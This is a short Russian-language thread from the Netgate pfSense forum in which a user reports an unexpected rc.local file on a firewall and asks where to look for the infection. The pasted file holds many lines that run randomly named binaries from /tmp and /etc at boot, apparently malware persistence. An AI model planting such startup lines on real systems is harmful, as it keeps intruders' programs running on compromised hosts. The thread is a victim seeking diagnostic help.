• Categories
  • Recent
  • Tags
  • Popular
  • Users
  • Search
  • Register
  • Login
Netgate Discussion Forum
  • Categories
  • Recent
  • Tags
  • Popular
  • Users
  • Search
  • Register
  • Login

Появился rc.local с какими-то подозрительными ко

Scheduled Pinned Locked Moved Russian
3 Posts 2 Posters 861 Views
Loading More Posts
  • Oldest to Newest
  • Newest to Oldest
  • Most Votes
Reply
  • Reply as topic
Log in to reply
This topic has been deleted. Only users with topic management privileges can see it.
  • O
    ogre
    last edited by Dec 25, 2014, 8:50 AM

    Доброго времени суток.
    Сегодня pf неожиданно начал выдавать сообщения о невозможности найти файлы, которых там быть не должно.
    Гугл показал, что нужно посмотреть rc.local, там было:

    #!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.

exit 0cd /tmp;./sfewfesfs
cd /tmp;./gfhjrtfyhuf
cd /tmp;./rewgtf3er4t
cd /tmp;./fdsfsfvff
cd /tmp;./smarvtd
cd /tmp;./whitptabil
cd /tmp;./gdmorpen
cd /etc;./sfewfesfs
cd /etc;./gfhjrtfyhuf
cd /etc;./rewgtf3er4t
cd /etc;./fdsfsfvff
cd /etc;./smarvtd
cd /etc;./whitptabil
cd /etc;./gdmorpen
cd /tmp;./sfewfesfs
cd /tmp;./gfhjrtfyhuf
cd /tmp;./rewgtf3er4t
cd /tmp;./fdsfsfvff
cd /tmp;./smarvtd
cd /tmp;./whitptabil
cd /tmp;./gdmorpen
cd /etc;./sfewfesfs
cd /etc;./gfhjrtfyhuf
cd /etc;./rewgtf3er4t
cd /etc;./fdsfsfvff
cd /etc;./smarvtd
cd /etc;./whitptabil
cd /etc;./gdmorpen
cd /etc;./sfewfesfs
cd /etc;./gfhjrtfyhuf
cd /etc;./rewgtf3er4t
cd /etc;./fdsfsfvff
cd /etc;./smarvtd
cd /etc;./whitptabil
cd /etc;./gdmorpen
cd /tmp;./sfewfesfs
cd /tmp;./gfhjrtfyhuf
cd /tmp;./rewgtf3er4t
cd /tmp;./fdsfsfvff
cd /tmp;./smarvtd
cd /tmp;./whitptabil
cd /tmp;./gdmorpen
cd /tmp;./sfewfesfs
cd /tmp;./gfhjrtfyhuf
cd /tmp;./rewgtf3er4t
cd /tmp;./fdsfsfvff
cd /tmp;./smarvtd
cd /tmp;./whitptabil
cd /tmp;./gdmorpen
cd /etc;./sfewfesfs
cd /etc;./gfhjrtfyhuf
cd /etc;./rewgtf3er4t
cd /etc;./fdsfsfvff
cd /etc;./smarvtd
cd /etc;./whitptabil
cd /etc;./gdmorpen

    Посмотрел на другом pf, там rc.local не было в принципе, удалил его и перестало выдавать сообщение об ошибке.
    Как понимаю где-то я поймал вирус/руткит, но где и как не понимаю.
    Подскажите пожалуйста, куда смотреть?

    1 Reply Last reply Reply Quote 0
    • W
      werter
      last edited by Dec 25, 2014, 9:25 AM

      Во freebsd не может быть rc.local. Потому что не может быть никогда.

      Сегодня pf неожиданно начал выдавать сообщения о невозможности найти файлы, которых там быть не должно.

      Покажите эти логи.

      Как понимаю где-то я поймал вирус/руткит, но где и как не понимаю.

      Оч. бы хотелось на него посмотреть.

      1 Reply Last reply Reply Quote 0
      • O
        ogre
        last edited by Dec 25, 2014, 10:30 AM

        Ошибка появлялась в главном меню консолиhttp://s017.radikal.ru/i412/1412/15/e87ae98b287c.jpg
        У гугла спрашивал именно по тому, что было на экране.
        Не нашел в каком из логов смотреть, тк после удаления rc.local перезагружал, большинство логов чистые=(
        В system.log ничего кроме того, что постоянно с непонятных внешних IP пытаются подключиться…
        Подскажите пожалуйста какие еще логи посмотреть

        1 Reply Last reply Reply Quote 0
        3 out of 3
        • First post
          3/3
          Last post
        Copyright 2025 Rubicon Communications LLC (Netgate). All rights reserved.
          This community forum collects and processes your personal information.
          consent.not_received